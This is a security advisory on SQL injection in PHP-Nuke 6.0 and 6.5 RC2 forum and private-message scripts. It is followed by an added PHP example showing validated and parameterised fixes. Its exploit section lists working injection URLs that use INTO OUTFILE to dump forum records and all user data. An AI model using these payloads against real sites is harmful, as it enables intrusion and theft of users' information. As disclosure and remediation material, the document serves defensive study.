Information :
°°°°°°°°°°°°°°
Language : PHP
Website : http://www.phpnuke.org
Version : 6.0 & 6.5 RC2
Modules : Forums, Private_Messages
Problem : SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/modules/Forums/viewtopic.php :
------------------------------------------------------------------------
$sql = "SELECT forum_type, forum_id, forum_pass, forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id = '$forum'";
------------------------------------------------------------------------

/modules/Forums/viewforum.php :
------------------------------------------------------------------------
$sql = "SELECT f.forum_id, f.forum_type, f.forum_pass, f.forum_name, u.uname, u.uid,m.forum_id,m.user_id FROM ${prefix}_forums f, ".$user_prefix."_users u, ${prefix}_forum_mods m WHERE f.forum_id = '$forum' AND m.forum_id = '$forum' AND m.user_id = u.uid";
------------------------------------------------------------------------

/modules/Forums/reply.php :
------------------------------------------------------------------------
$sql = "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id = '$forum')";
------------------------------------------------------------------------

/modules/Forums/newtopic.php :
------------------------------------------------------------------------
$sql = "SELECT forum_type, forum_pass, forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE (forum_id = '$forum')";
------------------------------------------------------------------------

/modules/Forums/editpost.php :
------------------------------------------------------------------------
$sql = "SELECT forum_name, forum_access, forum_moderator, forum_atch FROM ${prefix}_forums WHERE forum_id = '$forum'";
------------------------------------------------------------------------

/modules/Private_Messages/reply.php :
------------------------------------------------------------------------
if ($reply || $send) {
    if ($uname != "") {
        $res = sql_num_rows(sql_query("select * from ".$user_prefix."_users where uname='$uname'", $dbi), $dbi);
------------------------------------------------------------------------

In every file above, the request parameter ($forum or $uname) is placed inside the SQL string without any validation or escaping, so a quote character in the parameter ends the literal and the rest of the value is run as SQL.

Exploits :
°°°°°°°°°°
- This will save forum information into a txt file :
http://[target]/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1'%20INTO%20OUTFILE%20'[path/to/site]/vt.txt
http://[target]/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=reply&forum=1')%20INTO%20OUTFILE%20'[/path]/reply.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=newtopic&forum=1')%20INTO%20OUTFILE%20'[/path]/newtopic.txt'/*
http://[target]/modules.php?op=modload&name=Forums&file=editpost&forum=1'%20INTO%20OUTFILE%20'[/path]/editpost.txt
etc...

- This will save all users' information into a txt file :
http://[target]/modules.php?name=Private_Messages&file=reply&send=1&uname='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/users.txt

Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info

More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/PHP-Nuke6.0-Forums-Private_Messages.txt

frog-m@n
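The vulnerable query construction from the files above, shown beside a hardened version, as an added example that is not part of this advisory or of PHP-Nuke's code. It assumes PDO with an in-memory SQLite database and constructed sample rows in place of PHP-Nuke's sql_query wrapper; the table prefix "nuke" is a sample value.

```php
<?php
// Added example, not PHP-Nuke's own code. It contrasts the raw string
// concatenation used in the advisory's files with two fixes: an integer
// check for forum_id and a bound parameter for uname. The SQLite in-memory
// database and its rows are constructed here so the script runs offline.

// Vulnerable pattern, as in /modules/Forums/viewtopic.php: $forum goes in unfiltered,
// so a single quote inside it ends the literal and the remainder becomes SQL.
function build_forum_query_vulnerable(string $prefix, string $forum): string
{
    return "SELECT forum_name FROM {$prefix}_forums WHERE forum_id = '$forum'";
}

// Fix for the Forums files: forum_id is numeric, so accept only digits.
// Anything else (a quote, a keyword, a path) is rejected before any SQL is built.
function forum_id_from_request(array $get): int
{
    if (!isset($get['forum']) || !preg_match('/^[0-9]+$/', (string) $get['forum'])) {
        throw new InvalidArgumentException('forum must be a non-negative integer');
    }
    return (int) $get['forum'];
}

function build_forum_query_safe(string $prefix, int $forum): string
{
    return "SELECT forum_name FROM {$prefix}_forums WHERE forum_id = $forum";
}

// Fix for /modules/Private_Messages/reply.php: uname is free text, so bind it
// instead of quoting it by hand. The table prefix comes from config.php, not
// from the request, which is why it may still be interpolated.
function count_users_by_name(PDO $db, string $user_prefix, string $uname): int
{
    $stmt = $db->prepare("SELECT COUNT(*) FROM {$user_prefix}_users WHERE uname = :uname");
    $stmt->execute([':uname' => $uname]);
    return (int) $stmt->fetchColumn();
}

// Demonstration on constructed data. SQLite has no INTO OUTFILE; the point shown
// is that a bound value is compared as a literal name rather than parsed as SQL.
$db = new PDO('sqlite::memory:');
$db->exec("CREATE TABLE nuke_users (uid INTEGER, uname TEXT)");
$db->exec("INSERT INTO nuke_users VALUES (1, 'admin'), (2, 'alice')");

echo build_forum_query_vulnerable('nuke', "1' OR 1=1"), "\n";          // quote breaks out
echo build_forum_query_safe('nuke', forum_id_from_request(['forum' => '1'])), "\n";
echo "exact name matches: ", count_users_by_name($db, 'nuke', 'admin'), "\n";
echo "injected value matches: ", count_users_by_name($db, 'nuke', "' OR 1=1 /*"), "\n";
```

Calling forum_id_from_request with the advisory's forum values (for example "1' INTO OUTFILE '...") throws before a query is assembled, which is the behaviour to verify when applying a fix of this kind.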